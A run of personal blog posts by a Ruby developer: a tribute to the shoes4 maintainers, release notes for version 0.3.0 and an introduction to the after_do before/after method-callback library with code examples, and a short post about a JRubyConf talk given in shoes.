What impresses me most about the two of them is that they both have a family and a job but still find the time to work on open source. I hope I’ll be the same once I’m at that point in my life! I mean, Eric even has 5 children! FIVE! I can’t even imagine what that’s like 🙂. But that’s super fun too. I’ll never forget remote pair programming with him with one of his kids running around in the background and waving. Or Jason crediting his daughter with her first open source contribution on shoes. All super fun memories.

So everybody, shoes is coming. Try the preview release. Or wait for the next one. Or the release candidate. No matter what. Shoes is coming!

Shoes on!

Tobi

after_do 0.3.0 released

I just released version 0.3.0 of my little aspect-oriented-programming / method-callbacks library after_do! You can find an introduction here.

So what is in 0.3.0? Basically 2 things:

  • after_do now works properly with modules, meaning you can attach callbacks to the methods of a module, and objects of classes including that module will call them!
  • Fixed bugs around inheritance where it could happen that a block might get called too often or not at all

At the same time this release managed to delete code and remove complexity while improving functionality. How is that possible? Well, thanks to block scoping it is!

One problem I always had was figuring out which class’s callbacks to execute in combination with inheritance. You know – self is always the current object, and callbacks might be defined in superclasses. I wanted a way to know which class the currently called method is defined in, not what the class of the current object is. Luckily there is one point where I know that – the moment I add the callbacks (since they are added on that exact class/module). So we just need to save it:

callback_klazz = self # the class/module the callbacks were defined on
define_method method do |*args|
  # execute the callbacks of the defining class/module, not of self's class
  callback_klazz.send(:_after_do_execute_callbacks, :before, method, self, *args)
  return_value = send(alias_name, *args) # call the original method via its alias
  callback_klazz.send(:_after_do_execute_callbacks, :after, method, self, *args)
  return_value
end

Simple yet powerful.

Enjoy the 0.3 release of after_do 🙂

Introducing after_do: after/before method callbacks in Ruby

I want to introduce you to a little gem I built and use in some of my projects: after_do. What it does is pretty simple: you can attach callback blocks before/after methods are executed. And it looks like this:


MyClass.after :some_method do whatever_you_want end
# or/and
MyClass.before :some_method do pure_magic end

As I don’t fancy monkeypatching, you will have to extend the classes you want to use after_do on with the AfterDo module. E.g. for the code above to work:

MyClass.extend AfterDo
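Putting the pieces together, a minimal self-contained example could look like this (class and method names are made up):

require 'after_do'

class Purchase
  def complete
    # ... the actual purchase logic ...
  end
end

Purchase.extend AfterDo
Purchase.after :complete do |purchase|
  puts "completed purchase #{purchase.object_id}"
end

Purchase.new.complete # prints the message right after the method body ran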

after_do has no external runtime dependencies and the code is around 160 lines (blank lines and documentation included) with lots of small methods. So simplecov reports a little over 70 relevant lines of code (it ignores blank lines, docs etc.).

It works and is tested with current releases of all major ruby interpreters, e.g. MRI (1.9.3 and 2.0), JRuby and rubinius.

The github repo has some more documentation about use cases etc. – I won’t go into all of it here.

Why would I want to do that?

For me this catches the essence of Aspect Oriented Programming – doing something before or after a method is executed to fight cross-cutting concerns. What are these cross-cutting concerns? Glad you asked! They are aspects of your application that you can’t confine to a single class but are rather spread over multiple classes.

One of the most common examples is logging: Logging is done in many classes and many methods. As a result the real purpose of a method is cluttered with logging statements and it’s hard to get an overview of all the logging statements in your application at once.
Another example would be statistics: You might want to keep track of successful purchases, failed logins etc… the code to do so goes into the methods that handle these cases but really doesn’t contribute much to their actual purpose. And I’ve seen people use global variables to make statistics gathering available everywhere. Yikes.

With aspect oriented programming you could have all of those in a single file and as a result not clutter the original methods at all.

Access to parameters and the object

For a lot of purposes it’s nice to have access to the parameters of a method call and the object itself – after_do gives you just that:

MyClass.after :two_arg_method do |arg1, arg2, obj|
  something(arg1, arg2, obj)
end

With this you can log events like a successful purchase:

# Assuming CheckoutProcess#complete gets user as an argument
CheckoutProcess.after :complete do |user, checkout|
  @logger.log "#{user.name} checked out #{checkout.id}"
end

Removing repetition

Another use case is removing repetition from within a class. E.g. if you want to call the save method of an object after several different methods you can do the following:

class CoolClass
  extend AfterDo
  # lots of methods
  after :m1, :m2, :m3 do |*args, object| object.save end
end

This might remind you a bit of before_action/filter in Rails controllers.

How does it work?

When you attach a callback to a method with after_do, what it basically does is create a copy of that method and then redefine the method to look roughly like this (pseudo code):


execute_before_callbacks
return_value = original_method
execute_after_callbacks
return_value

Why build something like this?

I was working on a side project after reading Objects on Rails and wanted to try to separate the persistence concern from the actual object domain logic – for the fun of it, and to remove repetition along the way. My initial research didn’t turn up a well-maintained tiny library to serve my purpose. So I wrote one myself, named it after_do, et voilà – there is the solution to my initial problem:

persistor  = FilePersistor.new
Activity.extend AfterDo
Activity.after :start, :pause, :finish, :resurrect,
               :do_today, :do_another_day do |activity|
  persistor.save activity
end

Nice, isn’t it?

Is this a good idea?

That always depends on what you are doing with it. Like many things out there, it has its use cases but can easily be misused.

Advantages

  • Get cross cutting concerns packed together in one file – don’t have them scattered all over your code base obfuscating what the real responsibility of that class is
  • Don’t repeat yourself, define what is happening when in one file
  • I feel like it helps with the Single Responsibility Principle, as it enables classes to focus on their main responsibility and not deal with other stuff

Drawbacks

  • You lose clarity. With callbacks after a method it is not immediately visible what happens when a method is called as some behavior might be defined elsewhere.
  • You could use this to modify the behavior of classes everywhere. Don’t. Use it for what it is meant to be used for – a concern that is not the primary concern of the class you are adding the callback to but that class is still involved with.

A use case I feel this is particularly made for is redrawing. That’s what we use it for over at shoes4. E.g. we have multiple objects, and different actions on these objects may trigger a redraw (such as changing the position of a circle). This concern could be littered and repeated all over the code base – or nicely packed into one file, where you don’t repeat yourself for similar redrawing scenarios and you see all the redraws at a glance. Furthermore it makes it easier to do things like “just do one redraw every 1/30s” (not yet implemented though).
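In a simplified sketch (names made up – this is not shoes4’s actual internal API) that wiring could look like this:

Circle.extend AfterDo
Circle.after :move, :resize do |*_args, circle|
  circle.app.request_redraw
end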

Ultimately, you be the judge. I’d be happy if you were to go ahead and give after_do a try, say what you think about it, report bugs and feature requests.

Shoes Presentation from JRubyConf

So today I gave my first full-length presentation at a conference – JRubyConf, that is. It went well! Thanks for having me! 🙂

My presentation itself was written and presented in shoes (yes, a presentation about shoes in shoes!) and you can grab it from my github repository (there are instructions there on how to install/run it) – but I thought providing a PDF with screenshots of the presentation might be nice. I really encourage you to try the shoes version, though – you get way nicer effects there 🙂 And yes, my little presentation tool doesn’t have PDF export – yet 😉

So here you can get the presentation:

Have a great week, try out shoes and most importantly Shoes on!

Tobi